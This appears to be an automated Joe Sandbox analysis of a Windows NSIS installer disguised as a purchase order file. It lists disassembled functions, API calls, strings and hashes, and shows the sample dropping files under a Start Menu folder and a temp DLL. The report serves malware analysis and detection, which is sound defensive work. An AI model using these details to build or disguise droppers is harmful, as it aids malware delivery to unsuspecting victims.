                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID:
                                            • API String ID: 3282139019-0
                                            • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                            • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                            • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                            • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                            Function 004039AA Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 366 4039aa-4039c2 call 406694 369 4039c4-4039cf GetUserDefaultUILanguage call 406201 366->369 370 4039d6-403a0d call 406188 366->370 373 4039d4 369->373 376 403a25-403a2b lstrcatW 370->376 377 403a0f-403a20 call 406188 370->377 375 403a30-403a59 call 403c80 call 405c97 373->375 383 403aeb-403af3 call 405c97 375->383 384 403a5f-403a64 375->384 376->375 377->376 390 403b01-403b26 LoadImageW 383->390 391 403af5-403afc call 4062dc 383->391 384->383 385 403a6a-403a92 call 406188 384->385 385->383 392 403a94-403a98 385->392 394 403ba7-403baf call 40140b 390->394 395 403b28-403b58 RegisterClassW 390->395 391->390 397 403aaa-403ab6 lstrlenW 392->397 398 403a9a-403aa7 call 405bbc 392->398 407 403bb1-403bb4 394->407 408 403bb9-403bc4 call 403c80 394->408 399 403c76 395->399 400 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 395->400 404 403ab8-403ac6 lstrcmpiW 397->404 405 403ade-403ae6 call 405b8f call 4062ba 397->405 398->397 403 403c78-403c7f 399->403 400->394 404->405 406 403ac8-403ad2 GetFileAttributesW 404->406 405->383 411 403ad4-403ad6 406->411 412 403ad8-403ad9 call 405bdb 406->412 407->403 418 403bca-403be4 ShowWindow call 406624 408->418 419 403c4d-403c55 call 4053f5 408->419 411->405 411->412 412->405 426 403bf0-403c02 GetClassInfoW 418->426 427 403be6-403beb call 406624 418->427 424 403c57-403c5d 419->424 425 403c6f-403c71 call 40140b 419->425 424->407 428 403c63-403c6a call 40140b 424->428 425->399 431 403c04-403c14 GetClassInfoW RegisterClassW 426->431 432 403c1a-403c3d DialogBoxParamW call 40140b 426->432 427->426 428->407 431->432 435 403c42-403c4b call 4038fa 432->435 435->403
                                            APIs
                                              • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                              • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 004039C4
                                              • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                            • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 00403A2B
                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403AAB
                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps), ref: 00403B12
                                            • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                            • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B67
                                            • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                            • RegisterClassW.USER32(00433E80), ref: 00403C14
                                            • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                            • API String ID: 606308-3528727099
                                            • Opcode ID: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                            • Instruction ID: 064cc6771aa4ec85c149aa806f0e8f7fc9ed350ba8b4bb786133750ec3f232c3
                                            • Opcode Fuzzy Hash: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                            • Instruction Fuzzy Hash: 9061A7312007007ED720AF669D46E2B3A6CEB85B4AF40157FF945B51E2CBBDA941CB2D
                                            Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 442 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 458 403062-403065 451->458 459 4030b5-4030ba 451->459 454 402f70-402f87 452->454 456 402f89 454->456 457 402f8b-402f94 call 403331 454->457 456->457 465 402f9a-402fa1 457->465 466 4030bc-4030c4 call 402e79 457->466 461 403067-40307f call 403347 call 403331 458->461 462 403089-4030b3 GlobalAlloc call 403347 call 403116 458->462 459->444 461->459 489 403081-403087 461->489 462->459 487 4030c6-4030d7 462->487 471 402fa3-402fb7 call 405d6b 465->471 472 40301d-403021 465->472 466->459 477 40302b-403031 471->477 486 402fb9-402fc0 471->486 476 403023-40302a call 402e79 472->476 472->477 476->477 483 403040-40304a 477->483 484 403033-40303d call 406787 477->484 483->454 488 403050 483->488 484->483 486->477 492 402fc2-402fc9 486->492 493 4030d9 487->493 494 4030df-4030e4 487->494 488->451 489->459 489->462 492->477 495 402fcb-402fd2 492->495 493->494 496 4030e5-4030eb 494->496 495->477 497 402fd4-402fdb 495->497 496->496 498 4030ed-403108 SetFilePointer call 405d6b 496->498 497->477 499 402fdd-402ffd 497->499 502 40310d 498->502 499->459 501 403003-403007 499->501 503 403009-40300d 501->503 504 40300f-403017 501->504 502->444 503->488 503->504 504->477 505 403019-40301b 504->505 505->477
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402EEE
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,?,?,00000006,?,0000000A), ref: 00402F0A
                                              • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00402F56
                                            Strings
                                            • Inst, xrefs: 00402FC2
                                            • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00402EDD
                                            • C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                            • soft, xrefs: 00402FCB
                                            • Error launching installer, xrefs: 00402F2D
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                            • Null, xrefs: 00402FD4
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EE7
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 4283519449-3551141701
                                            • Opcode ID: b750e8e4e7df36a99149f0ab2e150caf8403846cf59efbe219a1874bf977bdf0
                                            • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                            • Opcode Fuzzy Hash: b750e8e4e7df36a99149f0ab2e150caf8403846cf59efbe219a1874bf977bdf0
                                            • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                            Function 004062DC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 506 4062dc-4062e7 507 4062e9-4062f8 506->507 508 4062fa-406310 506->508 507->508 509 406316-406323 508->509 510 406528-40652e 508->510 509->510 511 406329-406330 509->511 512 406534-40653f 510->512 513 406335-406342 510->513 511->510 515 406541-406545 call 4062ba 512->515 516 40654a-40654b 512->516 513->512 514 406348-406354 513->514 517 406515 514->517 518 40635a-406398 514->518 515->516 522 406523-406526 517->522 523 406517-406521 517->523 520 4064b8-4064bc 518->520 521 40639e-4063a9 518->521 526 4064be-4064c4 520->526 527 4064ef-4064f3 520->527 524 4063c2 521->524 525 4063ab-4063b0 521->525 522->510 523->510 533 4063c9-4063d0 524->533 525->524 530 4063b2-4063b5 525->530 531 4064d4-4064e0 call 4062ba 526->531 532 4064c6-4064d2 call 406201 526->532 528 406502-406513 lstrlenW 527->528 529 4064f5-4064fd call 4062dc 527->529 528->510 529->528 530->524 535 4063b7-4063ba 530->535 544 4064e5-4064eb 531->544 532->544 537 4063d2-4063d4 533->537 538 4063d5-4063d7 533->538 535->524 540 4063bc-4063c0 535->540 537->538 542 406412-406415 538->542 543 4063d9-4063f7 call 406188 538->543 540->533 545 406425-406428 542->545 546 406417-406423 GetSystemDirectoryW 542->546 553 4063fc-406400 543->553 544->528 548 4064ed 544->548 551 406493-406495 545->551 552 40642a-406438 GetWindowsDirectoryW 545->552 550 406497-40649b 546->550 549 4064b0-4064b6 call 40654e 548->549 549->528 550->549 557 40649d 550->557 551->550 554 40643a-406444 551->554 552->551 555 4064a0-4064a3 553->555 556 406406-40640d call 4062dc 553->556 562 406446-406449 554->562 563 40645e-406474 SHGetSpecialFolderLocation 554->563 555->549 560 4064a5-4064ab lstrcatW 555->560 556->550 557->555 560->549 562->563 565 40644b-406452 562->565 566 406476-40648d SHGetPathFromIDListW CoTaskMemFree 563->566 567 40648f 563->567 568 40645a-40645c 565->568 566->550 566->567 567->551 568->550 568->563
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040641D
                                            • GetWindowsDirectoryW.KERNEL32(Call,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                            • SHGetSpecialFolderLocation.SHELL32(00405359,0041D800,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                            • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 0040647A
                                            • CoTaskMemFree.OLE32(0041D800), ref: 00406485
                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                            • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 717251189-1230650788
                                            • Opcode ID: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                            • Instruction ID: 9562dd14d952d55a61127842092d6448be61ccc4685f782e3002b21b8a961bfb
                                            • Opcode Fuzzy Hash: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                            • Instruction Fuzzy Hash: 38611171A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 40176f-401794 call 402c41 call 405c06 638 401796-40179c call 4062ba 633->638 639 40179e-4017b0 call 4062ba call 405b8f lstrcatW 633->639 644 4017b5-4017b6 call 40654e 638->644 639->644 648 4017bb-4017bf 644->648 649 4017c1-4017cb call 4065fd 648->649 650 4017f2-4017f5 648->650 658 4017dd-4017ef 649->658 659 4017cd-4017db CompareFileTime 649->659 652 4017f7-4017f8 call 405d8b 650->652 653 4017fd-401819 call 405db0 650->653 652->653 660 40181b-40181e 653->660 661 40188d-4018b6 call 405322 call 403116 653->661 658->650 659->658 662 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 660->662 663 40186f-401879 call 405322 660->663 675 4018b8-4018bc 661->675 676 4018be-4018ca SetFileTime 661->676 662->648 695 401864-401865 662->695 673 401882-401888 663->673 677 402ace 673->677 675->676 679 4018d0-4018db CloseHandle 675->679 676->679 683 402ad0-402ad4 677->683 680 4018e1-4018e4 679->680 681 402ac5-402ac8 679->681 684 4018e6-4018f7 call 4062dc lstrcatW 680->684 685 4018f9-4018fc call 4062dc 680->685 681->677 691 401901-4022fc call 405920 684->691 685->691 691->683 695->673 697 401867-401868 695->697 697->663
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                              • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp$C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$Call
                                            • API String ID: 1941528284-2271000943
                                            • Opcode ID: b057a688d914eef7caf18a0e6fee2ba2bce91a0dfa11573c507a656315e6beb6
                                            • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                            • Opcode Fuzzy Hash: b057a688d914eef7caf18a0e6fee2ba2bce91a0dfa11573c507a656315e6beb6
                                            • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                            Function 00403116 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 699 403116-40312d 700 403136-40313f 699->700 701 40312f 699->701 702 403141 700->702 703 403148-40314d 700->703 701->700 702->703 704 40315d-40316a call 403331 703->704 705 40314f-403158 call 403347 703->705 709 403170-403174 704->709 710 40331f 704->710 705->704 711 4032ca-4032cc 709->711 712 40317a-4031c3 GetTickCount 709->712 713 403321-403322 710->713 717 40330c-40330f 711->717 718 4032ce-4032d1 711->718 714 403327 712->714 715 4031c9-4031d1 712->715 716 40332a-40332e 713->716 714->716 719 4031d3 715->719 720 4031d6-4031e4 call 403331 715->720 721 403311 717->721 722 403314-40331d call 403331 717->722 718->714 723 4032d3 718->723 719->720 720->710 732 4031ea-4031f3 720->732 721->722 722->710 733 403324 722->733 724 4032d6-4032dc 723->724 727 4032e0-4032ee call 403331 724->727 728 4032de 724->728 727->710 736 4032f0-4032fc call 405e62 727->736 728->727 735 4031f9-403219 call 4067f5 732->735 733->714 741 4032c2-4032c4 735->741 742 40321f-403232 GetTickCount 735->742 743 4032c6-4032c8 736->743 744 4032fe-403308 736->744 741->713 745 403234-40323c 742->745 746 40327d-40327f 742->746 743->713 744->724 749 40330a 744->749 750 403244-40327a MulDiv wsprintfW call 405322 745->750 751 40323e-403242 745->751 747 403281-403285 746->747 748 4032b6-4032ba 746->748 752 403287-40328e call 405e62 747->752 753 40329c-4032a7 747->753 748->715 754 4032c0 748->754 749->714 750->746 751->746 751->750 759 403293-403295 752->759 757 4032aa-4032ae 753->757 754->714 757->735 760 4032b4 757->760 759->743 761 403297-40329a 759->761 760->714 761->757
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%$@
                                            • API String ID: 551687249-3859443358
                                            • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                            • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                            • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                            • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                            Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 808 406624-406644 GetSystemDirectoryW 809 406646 808->809 810 406648-40664a 808->810 809->810 811 40665b-40665d 810->811 812 40664c-406655 810->812 814 40665e-406691 wsprintfW LoadLibraryExW 811->814 812->811 813 406657-406659 812->813 813->814
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                            • wsprintfW.USER32 ref: 00406676
                                            • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                            • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                            • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                            Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 815 4057f1-40583c CreateDirectoryW 816 405842-40584f GetLastError 815->816 817 40583e-405840 815->817 818 405851-405865 SetFileSecurityW 816->818 819 405869-40586b 816->819 817->819 818->817 820 405867 GetLastError 818->820 820->819
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                            • GetLastError.KERNEL32 ref: 00405848
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                            • GetLastError.KERNEL32 ref: 00405867
                                            Strings
                                            Memory Dump Source
